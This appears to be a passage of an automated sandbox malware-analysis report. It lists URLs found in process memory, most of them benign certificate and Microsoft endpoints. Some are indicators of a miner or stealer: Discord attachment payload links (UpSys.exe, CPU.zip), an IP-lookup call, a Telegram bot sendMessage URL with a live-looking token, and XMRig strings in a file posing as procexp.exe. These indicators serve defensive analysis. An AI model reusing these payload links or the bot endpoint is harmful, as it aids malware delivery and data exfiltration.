Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: powershell.exe, 0000001E.00000003.420144538.0000026161103000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.427098745.0000026161103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://logo.v
Source: powershell.exe, 00000002.00000002.425049839.000002D5D13E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
Source: DllHost.exe, 00000000.00000003.269278397.00000208C96F9000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346219857.00000208C796A000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000003.327004703.0000023FB3CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: DllHost.exe, 00000000.00000003.269278397.00000208C96F9000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346219857.00000208C796A000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000003.327004703.0000023FB3CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: DllHost.exe, 00000000.00000003.269278397.00000208C96F9000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346219857.00000208C796A000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000003.327004703.0000023FB3CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000002.00000002.382357824.000002D5C1589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000016.00000002.670545437.000002381F8AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.668955947.000002381F8AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.c
Source: svchost.exe, 00000016.00000002.670545437.000002381F8AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.668955947.000002381F8AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xm
Source: powershell.exe, 00000002.00000002.382357824.000002D5C1589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.428765806.00000261613E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.381791711.000002D5C1381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.427294155.00000261611E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.382357824.000002D5C1589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.428765806.00000261613E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: DllHost.exe, 00000000.00000003.269278397.00000208C96F9000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346219857.00000208C796A000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000003.327004703.0000023FB3CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 00000002.00000002.382357824.000002D5C1589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 00000022.00000002.367127734.0000018C3BE13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: DllHost.exe, 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, DllHost.exe, 00000000.00000000.260540492.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, System.exe, 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmp, System.exe, 0000000B.00000000.298163901.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: DllHost.exe, 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, DllHost.exe, 00000000.00000000.260540492.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, System.exe, 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmp, System.exe, 0000000B.00000000.298163901.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.11.z%02dH
Source: svchost.exe, 0000001B.00000002.785526412.0000016D7123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000001B.00000002.785526412.0000016D7123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000001B.00000002.785526412.0000016D7123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
Source: System.exe, 0000000B.00000003.322061932.0000023FB1F70000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.298163901.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmp, System.exe, 0000000B.00000002.401017091.0000023FB1E8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
Source: DllHost.exe, 00000000.00000003.265297552.00000208C7947000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.265333276.00000208C7947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/;d
Source: DllHost.exe, 00000000.00000000.369797476.00000208C7878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/E7
Source: DllHost.exe, 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, DllHost.exe, 00000000.00000000.260540492.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, System.exe, 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmp, System.exe, 0000000B.00000000.298163901.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://api.ipify.org/root
Source: DllHost.exe, 00000000.00000000.366088455.00000208C7947000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.266536827.00000208C7947000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.350905224.0000023FB1F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
Source: DllHost.exe, 00000000.00000000.366088455.00000208C7947000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.266536827.00000208C7947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/F
Source: DllHost.exe, DllHost.exe, 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, DllHost.exe, 00000000.00000000.260540492.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, System.exe, System.exe, 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmp, System.exe, 0000000B.00000000.298163901.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://api.telegram.org/bot
Source: DllHost.exe, 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, DllHost.exe, 00000000.00000000.260540492.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, System.exe, 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmp, System.exe, 0000000B.00000000.298163901.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://api.telegram.org/bot%0A
Source: System.exe, 0000000B.00000003.323417865.0000023FB1F66000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.350905224.0000023FB1F51000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000002.401017091.0000023FB1E8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=13270
Source: svchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000001B.00000002.785526412.0000016D7123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: DllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000002.401773947.0000023FB3C6A000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.351308203.0000023FB1F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
Source: DllHost.exe, 00000000.00000002.428101738.00000208C96F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/-11D0-8F0F-00C04FD7D062
Source: DllHost.exe, 00000000.00000000.366088455.00000208C7947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/B
Source: DllHost.exe, 00000000.00000000.369797476.00000208C7878000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000002.401017091.0000023FB1E8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957505698910218/UpSys.exe
Source: DllHost.exe, 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, DllHost.exe, 00000000.00000000.260540492.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, System.exe, 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmp, System.exe, 0000000B.00000000.298163901.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957709391069264/GPU6.ziphttps://cdn.dis
Source: DllHost.exe, 00000000.00000000.366820663.00000208C9741000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000002.428101738.00000208C96F0000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000002.426727400.00000208C78FF000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.321207659.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000002.401773947.0000023FB3C6A000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.358129624.0000023FB3C20000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000002.401017091.0000023FB1E8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zip
Source: System.exe, 0000000B.00000000.358129624.0000023FB3C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zip#
Source: DllHost.exe, 00000000.00000002.428101738.00000208C96F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zip&$S
Source: DllHost.exe, 00000000.00000002.426727400.00000208C78FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zip1.6LMEM
Source: DllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zip1C:
Source: System.exe, 0000000B.00000000.358129624.0000023FB3C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zip?
Source: DllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipC
Source: System.exe, 0000000B.00000002.401773947.0000023FB3C6A000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.358129624.0000023FB3C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipC:
Source: DllHost.exe, 00000000.00000002.426727400.00000208C78FF000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000002.401017091.0000023FB1E8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipLMEM
Source: DllHost.exe, 00000000.00000000.366820663.00000208C9741000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000000.369797476.00000208C7878000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.352076452.0000023FB3C42000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000002.401017091.0000023FB1E8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipPPC:
Source: DllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipS
Source: System.exe, 0000000B.00000000.358129624.0000023FB3C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipg
Source: DllHost.exe, 00000000.00000003.321207659.00000208C9733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipnC:
Source: DllHost.exe, 00000000.00000002.428101738.00000208C96F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipndows
Source: System.exe, 0000000B.00000000.358129624.0000023FB3C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipo
Source: DllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipp
Source: DllHost.exe, 00000000.00000000.366820663.00000208C9741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipsC:
Source: DllHost.exe, 00000000.00000000.366088455.00000208C7947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/v
Source: svchost.exe, 0000001B.00000002.785526412.0000016D7123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: powershell.exe, 00000002.00000002.425049839.000002D5D13E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.425049839.000002D5D13E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.425049839.000002D5D13E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000022.00000003.366220145.0000018C3BE5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000022.00000002.367175062.0000018C3BE3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000022.00000003.365973303.0000018C3BE67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.367291080.0000018C3BE69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000022.00000003.366166624.0000018C3BE46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.367209096.0000018C3BE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000022.00000002.367175062.0000018C3BE3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000022.00000002.367184169.0000018C3BE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366380098.0000018C3BE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366552191.0000018C3BE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000022.00000002.367184169.0000018C3BE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366380098.0000018C3BE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366552191.0000018C3BE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000022.00000003.366135442.0000018C3BE5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366380098.0000018C3BE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.367236646.0000018C3BE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000022.00000003.366220145.0000018C3BE5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000022.00000003.366135442.0000018C3BE5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.367236646.0000018C3BE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000022.00000002.367236646.0000018C3BE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000022.00000002.367209096.0000018C3BE4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366552191.0000018C3BE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000022.00000002.367175062.0000018C3BE3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000022.00000003.366380098.0000018C3BE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: powershell.exe, 00000002.00000002.382357824.000002D5C1589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: DllHost.exe, 00000000.00000002.426727400.00000208C78FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000002.00000002.425049839.000002D5D13E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000022.00000002.367175062.0000018C3BE3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000022.00000002.367175062.0000018C3BE3D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.367127734.0000018C3BE13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000022.00000003.366494078.0000018C3BE56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000022.00000003.366494078.0000018C3BE56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000022.00000003.366380098.0000018C3BE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000022.00000002.367184169.0000018C3BE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366380098.0000018C3BE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366552191.0000018C3BE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000022.00000003.366166624.0000018C3BE46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.367209096.0000018C3BE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: System.exe, 0000000B.00000003.327004703.0000023FB3CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
Source: DllHost.exe, 00000000.00000000.369797476.00000208C7878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lobalsign.com/ro
Source: procexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://xmrig.com/benchmark/%s
Source: procexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
Source: procexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://xmrig.com/wizard
Source: procexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://xmrig.com/wizard%s
Source: unknownDNS traffic detected: queries for: api.ipify.org
